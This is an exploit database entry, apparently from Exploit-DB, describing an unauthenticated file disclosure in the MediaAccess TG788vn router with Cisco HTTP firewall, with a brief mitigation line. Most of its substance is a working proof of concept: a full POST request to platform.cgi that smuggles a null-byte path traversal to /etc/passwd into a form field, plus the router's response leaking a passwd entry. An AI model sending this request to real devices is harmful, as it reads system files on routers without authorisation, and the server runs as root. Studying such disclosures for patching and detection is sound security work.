Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall

vendor:

TG788vn

by:

Ahmed Sultan (0x4148)

8,8

CVSS

HIGH

Critical Unauthenticated File Disclosure Flaw

200

CWE

Product Name: TG788vn

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall

MediaAccess TG788vn with Cisco firewall http config is vulnerable to critical unauthenticated file disclosure flaw. The http server is running with root privileges, which mean that the attacker might escalate the exploit for further critical attacks.

Mitigation:

Ensure that the http server is not running with root privileges and that authentication is required for access to sensitive files.

Source

Exploit-DB raw data:

Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall
Author : Ahmed Sultan (0x4148)
Email : 0x4148@gmail.com

MediaAccess TG788vn with Cisco firewall http config is vulnerable to
critical unauthenticated file disclosure flaw,

POC

Request:
POST /scgi-bin/platform.cgi HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://xx.xx.xx.xx/scgi-bin/platform.cgi
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 164

button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/passwd%00

Response:
HTTP/1.0 200 OK
Date: Sat, 01 Jan 2011 00:00:45 GMT
Server: Embedded HTTP Server.
Connection: close

loic_ipsec:x:500:500:xauth:/:/bin/cli

the http server is running with root privileges , which mean that the
attacker might escalate the exploit for further critical attacks